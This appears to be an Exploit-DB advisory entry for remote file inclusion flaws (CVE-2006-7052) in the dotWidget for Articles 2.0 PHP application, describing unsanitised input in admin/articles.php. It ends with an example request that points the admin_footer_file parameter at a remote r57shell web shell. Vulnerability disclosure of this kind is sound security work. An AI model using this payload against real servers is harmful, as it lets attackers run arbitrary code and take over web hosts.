dotWidget for articles 2.0 admin/articles.php Multiple Parameter Remote File Inclusion

2006-06-03T00:00:00
ID EDB-ID:28042
Type exploitdb
Reporter SwEET-DeViL
Modified 2006-06-03T00:00:00

Description

dotWidget for articles 2.0 admin/articles.php Multiple Parameter Remote File Inclusion. CVE-2006-7052. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/18479/info
   
dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
   
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
   
Some of these issue may be related to those discussed in BID 18258 (DotWidget CMS Multiple Remote File Include Vulnerabilities).

http://www.example.com/path/admin/articles.php?admin_footer_file=http://www.example2.com/r57shell.txt?